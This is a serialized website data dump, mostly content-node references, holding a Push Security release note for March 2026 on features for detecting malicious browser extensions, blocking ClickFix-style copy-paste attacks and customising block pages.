data":11936},[],{},{"nodeType":1364,"data":11938,"content":11939},{"uri":2613},[11940],{"nodeType":1257,"value":2616,"marks":11941,"data":11943},[11942],{"type":1372},{},{"nodeType":1257,"value":1703,"marks":11945,"data":11946},[],{},{"nodeType":1364,"data":11948,"content":11949},{"uri":2625},[11950],{"nodeType":1257,"value":2628,"marks":11951,"data":11953},[11952],{"type":1372},{},{"nodeType":1257,"value":2633,"marks":11955,"data":11956},[],{},{"nodeType":1364,"data":11958,"content":11959},{"uri"
:2638},[11960],{"nodeType":1257,"value":2641,"marks":11961,"data":11963},[11962],{"type":1372},{},{"nodeType":1257,"value":2646,"marks":11965,"data":11966},[],{},{"nodeType":1258,"data":11968,"content":11969},{},[11970,11973],{"nodeType":1257,"value":2653,"marks":11971,"data":11972},[],{},{"nodeType":1257,"value":2657,"marks":11974,"data":11976},[11975],{"type":1318},{},{"nodeType":1307,"data":11978,"content":11979},{},[],{"nodeType":1311,"data":11981,"content":11982},{},[11983],{"nodeType":1257,"value":2668,"marks":11984,"data":11986},[11985],{"type":1318},{},{"nodeType":1258,"data":11988,"content":11989},{},[11990,11993,11999],{"nodeType":1257,"value":2676,"marks":11991,"data":11992},[],{},{"nodeType":1364,"data":11994,"content":11995},{"uri":2681},[11996],{"nodeType":1257,"value":2684,"marks":11997,"data":11998},[],{},{"nodeType":1257,"value":2688,"marks":12000,"data":12001},[],{},{"nodeType":1258,"data":12003,"content":12004},{},[12005],{"nodeType":1257,"value":2695,"marks":12006,"data":12007},[],{},{"nodeType":1258,"data":12009,"content":12010},{},[12011,12014,12018],{"nodeType":1257,"value":2702,"marks":12012,"data":12013},[],{},{"nodeType":1257,"value":2706,"marks":12015,"data":12017},[12016],{"type":1318},{},{"nodeType":1257,"value":2711,"marks":12019,"data":12020},[],{},{"nodeType":1258,"data":12022,"content":12023},{},[12024],{"nodeType":1257,"value":2718,"marks":12025,"data":12026},[],{},{"nodeType":1258,"data":12028,"content":12029},{},[12030],{"nodeType":1257,"value":2725,"marks":12031,"data":12032},[],{},{"nodeType":1335,"data":12034,"content":12037},{"target":12035},{"sys":12036},{"id":2732,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":12039,"content":12040},{},[12041],{"nodeType":1257,"value":2738,"marks":12042,"data":12043},[],{},{"nodeType":1307,"data":12045,"content":12046},{},[],{"nodeType":1311,"data":12048,"content":12049},{},[12050],{"nodeType":1257,"value":2748,"marks":12051,"data":12053},[12052],{"type":1318},{},{"nodeType":1258,"d
ata":12055,"content":12056},{},[12057],{"nodeType":1257,"value":2756,"marks":12058,"data":12059},[],{},{"nodeType":1884,"data":12061,"content":12062},{},[12063,12072,12081,12090,12099],{"nodeType":1888,"data":12064,"content":12065},{},[12066],{"nodeType":1258,"data":12067,"content":12068},{},[12069],{"nodeType":1257,"value":2769,"marks":12070,"data":12071},[],{},{"nodeType":1888,"data":12073,"content":12074},{},[12075],{"nodeType":1258,"data":12076,"content":12077},{},[12078],{"nodeType":1257,"value":2779,"marks":12079,"data":12080},[],{},{"nodeType":1888,"data":12082,"content":12083},{},[12084],{"nodeType":1258,"data":12085,"content":12086},{},[12087],{"nodeType":1257,"value":2789,"marks":12088,"data":12089},[],{},{"nodeType":1888,"data":12091,"content":12092},{},[12093],{"nodeType":1258,"data":12094,"content":12095},{},[12096],{"nodeType":1257,"value":2799,"marks":12097,"data":12098},[],{},{"nodeType":1888,"data":12100,"content":12101},{},[12102],{"nodeType":1258,"data":12103,"content":12104},{},[12105],{"nodeType":1257,"value":2809,"marks":12106,"data":12107},[],{},{"nodeType":1258,"data":12109,"content":12110},{},[12111],{"nodeType":1257,"value":2816,"marks":12112,"data":12113},[],{},{"nodeType":1307,"data":12115,"content":12116},{},[],{"nodeType":1311,"data":12118,"content":12119},{},[12120],{"nodeType":1257,"value":2826,"marks":12121,"data":12123},[12122],{"type":1318},{},{"nodeType":1335,"data":12125,"content":12128},{"target":12126},{"sys":12127},{"id":2834,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":12130,"content":12131},{},[12132],{"nodeType":1257,"value":2840,"marks":12133,"data":12134},[],{},{"nodeType":1258,"data":12136,"content":12137},{},[12138],{"nodeType":1257,"value":2847,"marks":12139,"data":12140},[],{},{"nodeType":1335,"data":12142,"content":12145},{"target":12143},{"sys":12144},{"id":2854,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":12147,"content":12148},{},[12149],{"nodeType":1257,"value":2860,"marks":12150,"data":1215
1},[],{},{"nodeType":1884,"data":12153,"content":12154},{},[12155,12168],{"nodeType":1888,"data":12156,"content":12157},{},[12158],{"nodeType":1258,"data":12159,"content":12160},{},[12161,12165],{"nodeType":1257,"value":2873,"marks":12162,"data":12164},[12163],{"type":1318},{},{"nodeType":1257,"value":2878,"marks":12166,"data":12167},[],{},{"nodeType":1888,"data":12169,"content":12170},{},[12171],{"nodeType":1258,"data":12172,"content":12173},{},[12174,12178],{"nodeType":1257,"value":2888,"marks":12175,"data":12177},[12176],{"type":1318},{},{"nodeType":1257,"value":2893,"marks":12179,"data":12180},[],{},{"nodeType":1258,"data":12182,"content":12183},{},[12184],{"nodeType":1257,"value":2900,"marks":12185,"data":12186},[],{},{"nodeType":1258,"data":12188,"content":12189},{},[12190],{"nodeType":1257,"value":2907,"marks":12191,"data":12192},[],{},{"nodeType":1335,"data":12194,"content":12197},{"target":12195},{"sys":12196},{"id":2914,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":12199,"content":12200},{},[12201],{"nodeType":1257,"value":2920,"marks":12202,"data":12203},[],{},{"nodeType":1335,"data":12205,"content":12208},{"target":12206},{"sys":12207},{"id":2927,"type":1340,"linkType":1341},[],{"nodeType":1468,"data":12210,"content":12211},{},[12212],{"nodeType":1257,"value":2933,"marks":12213,"data":12215},[12214],{"type":1318},{},{"nodeType":1258,"data":12217,"content":12218},{},[12219,12222,12229],{"nodeType":1257,"value":2941,"marks":12220,"data":12221},[],{},{"nodeType":1364,"data":12223,"content":12224},{"uri":2946},[12225],{"nodeType":1257,"value":2949,"marks":12226,"data":12228},[12227],{"type":1372},{},{"nodeType":1257,"value":2954,"marks":12230,"data":12231},[],{},{"nodeType":1258,"data":12233,"content":12234},{},[12235],{"nodeType":1257,"value":2961,"marks":12236,"data":12237},[],{},{"nodeType":1884,"data":12239,"content":12240},{},[12241,12250,12259],{"nodeType":1888,"data":12242,"content":12243},{},[12244],{"nodeType":1258,"data":12245,"content":1
2246},{},[12247],{"nodeType":1257,"value":2974,"marks":12248,"data":12249},[],{},{"nodeType":1888,"data":12251,"content":12252},{},[12253],{"nodeType":1258,"data":12254,"content":12255},{},[12256],{"nodeType":1257,"value":2984,"marks":12257,"data":12258},[],{},{"nodeType":1888,"data":12260,"content":12261},{},[12262],{"nodeType":1258,"data":12263,"content":12264},{},[12265],{"nodeType":1257,"value":2994,"marks":12266,"data":12267},[],{},{"nodeType":1258,"data":12269,"content":12270},{},[12271],{"nodeType":1257,"value":3001,"marks":12272,"data":12273},[],{},{"nodeType":1884,"data":12275,"content":12276},{},[12277,12286,12295],{"nodeType":1888,"data":12278,"content":12279},{},[12280],{"nodeType":1258,"data":12281,"content":12282},{},[12283],{"nodeType":1257,"value":3014,"marks":12284,"data":12285},[],{},{"nodeType":1888,"data":12287,"content":12288},{},[12289],{"nodeType":1258,"data":12290,"content":12291},{},[12292],{"nodeType":1257,"value":3024,"marks":12293,"data":12294},[],{},{"nodeType":1888,"data":12296,"content":12297},{},[12298],{"nodeType":1258,"data":12299,"content":12300},{},[12301],{"nodeType":1257,"value":3034,"marks":12302,"data":12303},[],{},{"nodeType":1307,"data":12305,"content":12306},{},[],{"nodeType":1311,"data":12308,"content":12309},{},[12310],{"nodeType":1257,"value":3044,"marks":12311,"data":12313},[12312],{"type":1318},{},{"nodeType":1258,"data":12315,"content":12316},{},[12317],{"nodeType":1257,"value":3052,"marks":12318,"data":12319},[],{},{"nodeType":1335,"data":12321,"content":12324},{"target":12322},{"sys":12323},{"id":3059,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":12326,"content":12327},{},[12328,12331,12338],{"nodeType":1257,"value":3065,"marks":12329,"data":12330},[],{},{"nodeType":1364,"data":12332,"content":12333},{"uri":2681},[12334],{"nodeType":1257,"value":3072,"marks":12335,"data":12337},[12336],{"type":1372},{},{"nodeType":1257,"value":3077,"marks":12339,"data":12340},[],{},{"nodeType":1258,"data":12342,"content":1
2343},{},[12344],{"nodeType":1257,"value":3084,"marks":12345,"data":12346},[],{},{"nodeType":1258,"data":12348,"content":12349},{},[12350,12353,12360,12363,12370],{"nodeType":1257,"value":2223,"marks":12351,"data":12352},[],{},{"nodeType":1364,"data":12354,"content":12355},{"uri":2228},[12356],{"nodeType":1257,"value":2231,"marks":12357,"data":12359},[12358],{"type":1372},{},{"nodeType":1257,"value":2236,"marks":12361,"data":12362},[],{},{"nodeType":1364,"data":12364,"content":12365},{"uri":2241},[12366],{"nodeType":1257,"value":2244,"marks":12367,"data":12369},[12368],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":12371,"data":12372},[],{},{"nodeType":1335,"data":12374,"content":12377},{"target":12375},{"sys":12376},{"id":3117,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":12379,"content":12380},{},[12381],{"nodeType":1257,"value":31,"marks":12382,"data":12383},[],{},{"items":12385},[12386,12388],{"sys":12387,"name":1270},{"id":1269},{"sys":12389,"name":1274},{"id":1273},{"items":12391},[12392],{"fullName":3138,"firstName":3139,"jobTitle":3140,"profilePicture":12393},{"url":3142},{"__typename":1278,"sys":12395,"content":12396,"title":3763,"synopsis":3764,"hashTags":118,"publishedDate":3765,"slug":3766,"tagsCollection":12919,"authorsCollection":12925},{"id":3145},{"json":12397},{"nodeType":1259,"data":12398,"content":12399},{},[12400,12416,12422,12428,12431,12438,12454,12470,12497,12502,12505,12512,12519,12525,12541,12547,12552,12557,12563,12569,12576,12582,12588,12593,12599,12615,12622,12628,12634,12650,12655,12671,12676,12682,12687,12690,12697,12703,12719,12725,12748,12754,12761,12764,12771,12777,12783,12788,12794,12833,12838,12844,12870,12875,12913],{"nodeType":1258,"data":12401,"content":12402},{},[12403,12406,12413],{"nodeType":1257,"value":31,"marks":12404,"data":12405},[],{},{"nodeType":1364,"data":12407,"content":12408},{"uri":3158},[12409],{"nodeType":1257,"value":3161,"marks":12410,"data":12412},[12411],{"type":1372},{},{"nodeType":1257,"v
alue":3166,"marks":12414,"data":12415},[],{},{"nodeType":1258,"data":12417,"content":12418},{},[12419],{"nodeType":1257,"value":3173,"marks":12420,"data":12421},[],{},{"nodeType":1258,"data":12423,"content":12424},{},[12425],{"nodeType":1257,"value":3180,"marks":12426,"data":12427},[],{},{"nodeType":1307,"data":12429,"content":12430},{},[],{"nodeType":1311,"data":12432,"content":12433},{},[12434],{"nodeType":1257,"value":3190,"marks":12435,"data":12437},[12436],{"type":1318},{},{"nodeType":1258,"data":12439,"content":12440},{},[12441,12444,12451],{"nodeType":1257,"value":3198,"marks":12442,"data":12443},[],{},{"nodeType":1364,"data":12445,"content":12446},{"uri":3203},[12447],{"nodeType":1257,"value":3206,"marks":12448,"data":12450},[12449],{"type":1372},{},{"nodeType":1257,"value":3211,"marks":12452,"data":12453},[],{},{"nodeType":1258,"data":12455,"content":12456},{},[12457,12460,12467],{"nodeType":1257,"value":3218,"marks":12458,"data":12459},[],{},{"nodeType":1364,"data":12461,"content":12462},{"uri":1696},[12463],{"nodeType":1257,"value":3225,"marks":12464,"data":12466},[12465],{"type":1372},{},{"nodeType":1257,"value":3230,"marks":12468,"data":12469},[],{},{"nodeType":1258,"data":12471,"content":12472},{},[12473,12476,12480,12483,12487,12490,12494],{"nodeType":1257,"value":3237,"marks":12474,"data":12475},[],{},{"nodeType":1257,"value":3241,"marks":12477,"data":12479},[12478],{"type":1318},{},{"nodeType":1257,"value":3246,"marks":12481,"data":12482},[],{},{"nodeType":1257,"value":3250,"marks":12484,"data":12486},[12485],{"type":1318},{},{"nodeType":1257,"value":3255,"marks":12488,"data":12489},[],{},{"nodeType":1257,"value":3259,"marks":12491,"data":12493},[12492],{"type":1318},{},{"nodeType":1257,"value":3264,"marks":12495,"data":12496},[],{},{"nodeType":1335,"data":12498,"content":12501},{"target":12499},{"sys":12500},{"id":3271,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":12503,"content":12504},{},[],{"nodeType":1311,"data":12506,"content":12507}
,{},[12508],{"nodeType":1257,"value":3280,"marks":12509,"data":12511},[12510],{"type":1318},{},{"nodeType":1468,"data":12513,"content":12514},{},[12515],{"nodeType":1257,"value":3288,"marks":12516,"data":12518},[12517],{"type":1318},{},{"nodeType":1258,"data":12520,"content":12521},{},[12522],{"nodeType":1257,"value":3296,"marks":12523,"data":12524},[],{},{"nodeType":1258,"data":12526,"content":12527},{},[12528,12531,12538],{"nodeType":1257,"value":31,"marks":12529,"data":12530},[],{},{"nodeType":1364,"data":12532,"content":12533},{"uri":3158},[12534],{"nodeType":1257,"value":3309,"marks":12535,"data":12537},[12536],{"type":1372},{},{"nodeType":1257,"value":3314,"marks":12539,"data":12540},[],{},{"nodeType":1258,"data":12542,"content":12543},{},[12544],{"nodeType":1257,"value":3321,"marks":12545,"data":12546},[],{},{"nodeType":1335,"data":12548,"content":12551},{"target":12549},{"sys":12550},{"id":1454,"type":1340,"linkType":1341},[],{"nodeType":1335,"data":12553,"content":12556},{"target":12554},{"sys":12555},{"id":3333,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":12558,"content":12559},{},[12560],{"nodeType":1257,"value":3339,"marks":12561,"data":12562},[],{},{"nodeType":1258,"data":12564,"content":12565},{},[12566],{"nodeType":1257,"value":3346,"marks":12567,"data":12568},[],{},{"nodeType":1468,"data":12570,"content":12571},{},[12572],{"nodeType":1257,"value":3353,"marks":12573,"data":12575},[12574],{"type":1318},{},{"nodeType":1258,"data":12577,"content":12578},{},[12579],{"nodeType":1257,"value":3361,"marks":12580,"data":12581},[],{},{"nodeType":1258,"data":12583,"content":12584},{},[12585],{"nodeType":1257,"value":3368,"marks":12586,"data":12587},[],{},{"nodeType":1335,"data":12589,"content":12592},{"target":12590},{"sys":12591},{"id":3375,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":12594,"content":12595},{},[12596],{"nodeType":1257,"value":3381,"marks":12597,"data":12598},[],{},{"nodeType":1258,"data":12600,"content":12601},{},[12602,12
605,12612],{"nodeType":1257,"value":3388,"marks":12603,"data":12604},[],{},{"nodeType":1364,"data":12606,"content":12607},{"uri":3393},[12608],{"nodeType":1257,"value":3396,"marks":12609,"data":12611},[12610],{"type":1372},{},{"nodeType":1257,"value":3401,"marks":12613,"data":12614},[],{},{"nodeType":1468,"data":12616,"content":12617},{},[12618],{"nodeType":1257,"value":3408,"marks":12619,"data":12621},[12620],{"type":1318},{},{"nodeType":1258,"data":12623,"content":12624},{},[12625],{"nodeType":1257,"value":3416,"marks":12626,"data":12627},[],{},{"nodeType":1258,"data":12629,"content":12630},{},[12631],{"nodeType":1257,"value":3423,"marks":12632,"data":12633},[],{},{"nodeType":1258,"data":12635,"content":12636},{},[12637,12640,12647],{"nodeType":1257,"value":3430,"marks":12638,"data":12639},[],{},{"nodeType":1364,"data":12641,"content":12642},{"uri":3435},[12643],{"nodeType":1257,"value":3438,"marks":12644,"data":12646},[12645],{"type":1372},{},{"nodeType":1257,"value":3443,"marks":12648,"data":12649},[],{},{"nodeType":1335,"data":12651,"content":12654},{"target":12652},{"sys":12653},{"id":3450,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":12656,"content":12657},{},[12658,12661,12668],{"nodeType":1257,"value":3456,"marks":12659,"data":12660},[],{},{"nodeType":1364,"data":12662,"content":12663},{"uri":3461},[12664],{"nodeType":1257,"value":3464,"marks":12665,"data":12667},[12666],{"type":1372},{},{"nodeType":1257,"value":3469,"marks":12669,"data":12670},[],{},{"nodeType":1335,"data":12672,"content":12675},{"target":12673},{"sys":12674},{"id":3476,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":12677,"content":12678},{},[12679],{"nodeType":1257,"value":3482,"marks":12680,"data":12681},[],{},{"nodeType":1335,"data":12683,"content":12686},{"target":12684},{"sys":12685},{"id":3489,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":12688,"content":12689},{},[],{"nodeType":1311,"data":12691,"content":12692},{},[12693],{"nodeType":1257,"value":3498,"
marks":12694,"data":12696},[12695],{"type":1318},{},{"nodeType":1258,"data":12698,"content":12699},{},[12700],{"nodeType":1257,"value":3506,"marks":12701,"data":12702},[],{},{"nodeType":1258,"data":12704,"content":12705},{},[12706,12709,12716],{"nodeType":1257,"value":3513,"marks":12707,"data":12708},[],{},{"nodeType":1364,"data":12710,"content":12711},{"uri":3518},[12712],{"nodeType":1257,"value":2684,"marks":12713,"data":12715},[12714],{"type":1372},{},{"nodeType":1257,"value":3525,"marks":12717,"data":12718},[],{},{"nodeType":1258,"data":12720,"content":12721},{},[12722],{"nodeType":1257,"value":3532,"marks":12723,"data":12724},[],{},{"nodeType":1258,"data":12726,"content":12727},{},[12728,12731,12735,12738,12745],{"nodeType":1257,"value":3539,"marks":12729,"data":12730},[],{},{"nodeType":1257,"value":3543,"marks":12732,"data":12734},[12733],{"type":1318},{},{"nodeType":1257,"value":3548,"marks":12736,"data":12737},[],{},{"nodeType":1364,"data":12739,"content":12740},{"uri":3553},[12741],{"nodeType":1257,"value":3556,"marks":12742,"data":12744},[12743],{"type":1372},{},{"nodeType":1257,"value":3561,"marks":12746,"data":12747},[],{},{"nodeType":1258,"data":12749,"content":12750},{},[12751],{"nodeType":1257,"value":3568,"marks":12752,"data":12753},[],{},{"nodeType":1258,"data":12755,"content":12756},{},[12757],{"nodeType":1257,"value":3575,"marks":12758,"data":12760},[12759],{"type":1318},{},{"nodeType":1307,"data":12762,"content":12763},{},[],{"nodeType":1311,"data":12765,"content":12766},{},[12767],{"nodeType":1257,"value":3586,"marks":12768,"data":12770},[12769],{"type":1318},{},{"nodeType":1258,"data":12772,"content":12773},{},[12774],{"nodeType":1257,"value":3594,"marks":12775,"data":12776},[],{},{"nodeType":1258,"data":12778,"content":12779},{},[12780],{"nodeType":1257,"value":3601,"marks":12781,"data":12782},[],{},{"nodeType":1335,"data":12784,"content":12787},{"target":12785},{"sys":12786},{"id":3608,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":1
2789,"content":12790},{},[12791],{"nodeType":1257,"value":3614,"marks":12792,"data":12793},[],{},{"nodeType":1884,"data":12795,"content":12796},{},[12797,12815],{"nodeType":1888,"data":12798,"content":12799},{},[12800],{"nodeType":1258,"data":12801,"content":12802},{},[12803,12806,12812],{"nodeType":1257,"value":31,"marks":12804,"data":12805},[],{},{"nodeType":1364,"data":12807,"content":12808},{"uri":3631},[12809],{"nodeType":1257,"value":3634,"marks":12810,"data":12811},[],{},{"nodeType":1257,"value":3638,"marks":12813,"data":12814},[],{},{"nodeType":1888,"data":12816,"content":12817},{},[12818],{"nodeType":1258,"data":12819,"content":12820},{},[12821,12824,12830],{"nodeType":1257,"value":31,"marks":12822,"data":12823},[],{},{"nodeType":1364,"data":12825,"content":12826},{"uri":3652},[12827],{"nodeType":1257,"value":3655,"marks":12828,"data":12829},[],{},{"nodeType":1257,"value":3659,"marks":12831,"data":12832},[],{},{"nodeType":1335,"data":12834,"content":12837},{"target":12835},{"sys":12836},{"id":3666,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":12839,"content":12840},{},[12841],{"nodeType":1257,"value":3672,"marks":12842,"data":12843},[],{},{"nodeType":1258,"data":12845,"content":12846},{},[12847,12850,12857,12860,12867],{"nodeType":1257,"value":3679,"marks":12848,"data":12849},[],{},{"nodeType":1364,"data":12851,"content":12852},{"uri":3684},[12853],{"nodeType":1257,"value":3687,"marks":12854,"data":12856},[12855],{"type":1372},{},{"nodeType":1257,"value":3692,"marks":12858,"data":12859},[],{},{"nodeType":1364,"data":12861,"content":12862},{"uri":1804},[12863],{"nodeType":1257,"value":3699,"marks":12864,"data":12866},[12865],{"type":1372},{},{"nodeType":1257,"value":3704,"marks":12868,"data":12869},[],{},{"nodeType":1335,"data":12871,"content":12874},{"target":12872},{"sys":12873},{"id":3711,"type":1340,"linkType":1341},[],{"nodeType":3714,"data":12876,"content":12877},{},[12878],{"nodeType":1258,"data":12879,"content":12880},{},[12881,12884,12891,
12894,12900,12903,12910],{"nodeType":1257,"value":3721,"marks":12882,"data":12883},[],{},{"nodeType":1364,"data":12885,"content":12886},{"uri":2228},[12887],{"nodeType":1257,"value":3728,"marks":12888,"data":12890},[12889],{"type":1372},{},{"nodeType":1257,"value":3548,"marks":12892,"data":12893},[],{},{"nodeType":1364,"data":12895,"content":12896},{"uri":3737},[12897],{"nodeType":1257,"value":3740,"marks":12898,"data":12899},[],{},{"nodeType":1257,"value":3744,"marks":12901,"data":12902},[],{},{"nodeType":1364,"data":12904,"content":12905},{"uri":2241},[12906],{"nodeType":1257,"value":2244,"marks":12907,"data":12909},[12908],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":12911,"data":12912},[],{},{"nodeType":1258,"data":12914,"content":12915},{},[12916],{"nodeType":1257,"value":31,"marks":12917,"data":12918},[],{},{"items":12920},[12921,12923],{"sys":12922,"name":1270},{"id":1269},{"sys":12924,"name":1274},{"id":1273},{"items":12926},[12927],{"fullName":2265,"firstName":2266,"jobTitle":2267,"profilePicture":12928},{"url":2269},"content:blog:stryker-handala-report.json","blog/stryker-handala-report.json","blog/stryker-handala-report",{"_path":12933,"_dir":1242,"_draft":6,"_partial":6,"_locale":31,"sys":12934,"ogImage":118,"summary":12937,"title":12948,"subtitle":118,"metaTitle":12949,"synopsis":12950,"hashTags":118,"publishedDate":12951,"slug":12952,"tagsCollection":12953,"authorsCollection":12959,"content":12967,"relatedBlogPostsCollection":13526,"_id":14247,"_type":6653,"_source":6654,"_file":14248,"_stem":14249,"_extension":6653},"/blog/product-release-march-2026",{"id":12935,"publishedAt":12936},"3Yw48rVLntipUijLR0CYf2","2026-03-10T20:32:25.404Z",{"json":12938},{"data":12939,"content":12940,"nodeType":1259},{},[12941],{"data":12942,"content":12943,"nodeType":1258},{},[12944],{"data":12945,"marks":12946,"value":12947,"nodeType":1257},{},[],"Malicious extension detection, block ClickFix-style attacks, custom branding and more","Product release: March 
2026","Push Security new product features for March 2026","Here’s what’s new on the Push platform for March 2026.","2026-03-10T00:00:00.000Z","product-release-march-2026",{"items":12954},[12955],{"sys":12956,"name":12958},{"id":12957},"5jk0kqjSdSK2L0YiistQjY","Release notes",{"items":12960},[12961],{"fullName":12962,"firstName":12963,"jobTitle":12964,"profilePicture":12965},"Andy Waugh","Andy","VP Product",{"url":12966},"https://images.ctfassets.net/y1cdw1ablpvd/3Rf76rJn6S9inMb4dUnAIJ/0a787f8141d05b95300e2fe77c4493fa/DSC_6868.jpg",{"json":12968,"links":13469},{"data":12969,"content":12970,"nodeType":1259},{},[12971,12978,13041,13048,13055,13071,13087,13093,13113,13119,13135,13142,13148,13166,13172,13193,13226,13244,13250,13257,13272,13278,13296,13302,13309,13333,13358,13376,13383,13390,13463],{"data":12972,"content":12973,"nodeType":1311},{},[12974],{"data":12975,"marks":12976,"value":12977,"nodeType":1257},{},[],"What's new this month:",{"data":12979,"content":12980,"nodeType":1884},{},[12981,12991,13001,13011,13021,13031],{"data":12982,"content":12983,"nodeType":1888},{},[12984],{"data":12985,"content":12986,"nodeType":1258},{},[12987],{"data":12988,"marks":12989,"value":12990,"nodeType":1257},{},[],"Detect malicious browser extensions",{"data":12992,"content":12993,"nodeType":1888},{},[12994],{"data":12995,"content":12996,"nodeType":1258},{},[12997],{"data":12998,"marks":12999,"value":13000,"nodeType":1257},{},[],"Create a blocklist or allowlist for browser extensions",{"data":13002,"content":13003,"nodeType":1888},{},[13004],{"data":13005,"content":13006,"nodeType":1258},{},[13007],{"data":13008,"marks":13009,"value":13010,"nodeType":1257},{},[],"Block ClickFix-style attacks and collect payloads for investigation",{"data":13012,"content":13013,"nodeType":1888},{},[13014],{"data":13015,"content":13016,"nodeType":1258},{},[13017],{"data":13018,"marks":13019,"value":13020,"nodeType":1257},{},[],"Custom branding for employee-facing banners and block 
pages",{"data":13022,"content":13023,"nodeType":1888},{},[13024],{"data":13025,"content":13026,"nodeType":1258},{},[13027],{"data":13028,"marks":13029,"value":13030,"nodeType":1257},{},[],"Collect additional metadata to support threat detection",{"data":13032,"content":13033,"nodeType":1888},{},[13034],{"data":13035,"content":13036,"nodeType":1258},{},[13037],{"data":13038,"marks":13039,"value":13040,"nodeType":1257},{},[],"And a few other things … ",{"data":13042,"content":13043,"nodeType":1311},{},[13044],{"data":13045,"marks":13046,"value":13047,"nodeType":1257},{},[],"Detect malicious extensions",{"data":13049,"content":13050,"nodeType":1258},{},[13051],{"data":13052,"marks":13053,"value":13054,"nodeType":1257},{},[],"Push can now detect and block malicious browser extensions found in your environment. ",{"data":13056,"content":13057,"nodeType":1258},{},[13058,13062,13067],{"data":13059,"marks":13060,"value":13061,"nodeType":1257},{},[],"Push maintains a global list of malicious extensions based on our own threat research and publicly available threat intelligence. When an extension in your environment matches a malicious extension ID, Push will raise a detection on the ",{"data":13063,"marks":13064,"value":13066,"nodeType":1257},{},[13065],{"type":1318},"Detections",{"data":13068,"marks":13069,"value":13070,"nodeType":1257},{},[]," page of the Push admin console. You can also configure the control to warn or block users automatically.",{"data":13072,"content":13073,"nodeType":1258},{},[13074,13078,13083],{"data":13075,"marks":13076,"value":13077,"nodeType":1257},{},[],"To enable malicious extension detection, go to the ",{"data":13079,"marks":13080,"value":13082,"nodeType":1257},{},[13081],{"type":1318},"Controls",{"data":13084,"marks":13085,"value":13086,"nodeType":1257},{},[]," page in the Push admin console. 
",{"data":13088,"content":13092,"nodeType":1335},{"target":13089},{"sys":13090},{"id":13091,"type":1340,"linkType":1341},"1QV5UQ04MYLpWY7jTocvO4",[],{"data":13094,"content":13095,"nodeType":1258},{},[13096,13099,13110],{"data":13097,"marks":13098,"value":31,"nodeType":1257},{},[],{"data":13100,"content":13104,"nodeType":13109},{"target":13101},{"sys":13102},{"id":13103,"type":1340,"linkType":1341},"5NyiWgjMDwk16XZ0S681JK",[13105],{"data":13106,"marks":13107,"value":13108,"nodeType":1257},{},[],"Learn more","entry-hyperlink",{"data":13111,"marks":13112,"value":31,"nodeType":1257},{},[],{"data":13114,"content":13115,"nodeType":1311},{},[13116],{"data":13117,"marks":13118,"value":13000,"nodeType":1257},{},[],{"data":13120,"content":13121,"nodeType":1258},{},[13122,13126,13131],{"data":13123,"marks":13124,"value":13125,"nodeType":1257},{},[],"You can also block unwanted extensions or allowlist only the extensions you want in your environment, using Push’s ",{"data":13127,"marks":13128,"value":13130,"nodeType":1257},{},[13129],{"type":1318},"Browser extension blocking",{"data":13132,"marks":13133,"value":13134,"nodeType":1257},{},[]," control.",{"data":13136,"content":13137,"nodeType":1258},{},[13138],{"data":13139,"marks":13140,"value":13141,"nodeType":1257},{},[],"End-users will see a block page if they attempt to enable a blocked extension or install one via the Chrome or Microsoft extension 
stores.",{"data":13143,"content":13147,"nodeType":1335},{"target":13144},{"sys":13145},{"id":13146,"type":1340,"linkType":1341},"3OCdGfsyNTLXQx77dwzY9L",[],{"data":13149,"content":13150,"nodeType":1258},{},[13151,13154,13163],{"data":13152,"marks":13153,"value":31,"nodeType":1257},{},[],{"data":13155,"content":13159,"nodeType":13109},{"target":13156},{"sys":13157},{"id":13158,"type":1340,"linkType":1341},"3ibVBa6u0XfcXXDVtON5th",[13160],{"data":13161,"marks":13162,"value":13108,"nodeType":1257},{},[],{"data":13164,"marks":13165,"value":31,"nodeType":1257},{},[],{"data":13167,"content":13168,"nodeType":1311},{},[13169],{"data":13170,"marks":13171,"value":13010,"nodeType":1257},{},[],{"data":13173,"content":13174,"nodeType":1258},{},[13175,13179,13189],{"data":13176,"marks":13177,"value":13178,"nodeType":1257},{},[],"You can now block ClickFix-style malicious copy and paste attacks using Push. These are among the ",{"data":13180,"content":13184,"nodeType":13109},{"target":13181},{"sys":13182},{"id":13183,"type":1340,"linkType":1341},"1u8RJxC00HbBhCBVxcDnkK",[13185],{"data":13186,"marks":13187,"value":13188,"nodeType":1257},{},[],"fastest-growing",{"data":13190,"marks":13191,"value":13192,"nodeType":1257},{},[]," browser-based attacks. You can also choose to collect the payload for your security team to investigate.",{"data":13194,"content":13195,"nodeType":1258},{},[13196,13200,13205,13209,13214,13217,13222],{"data":13197,"marks":13198,"value":13199,"nodeType":1257},{},[],"From the Push admin console, go to ",{"data":13201,"marks":13202,"value":13204,"nodeType":1257},{},[13203],{"type":1318},"Controls > Malicious copy and paste detection",{"data":13206,"marks":13207,"value":13208,"nodeType":1257},{},[],". 
Then create a configuration rule to select the ",{"data":13210,"marks":13211,"value":13213,"nodeType":1257},{},[13212],{"type":1318},"Mode",{"data":13215,"marks":13216,"value":1703,"nodeType":1257},{},[],{"data":13218,"marks":13219,"value":13221,"nodeType":1257},{},[13220],{"type":1318},"Scope",{"data":13223,"marks":13224,"value":13225,"nodeType":1257},{},[],". If you’ve enabled payload collection, Push will collect the malicious payload and include it in the detection 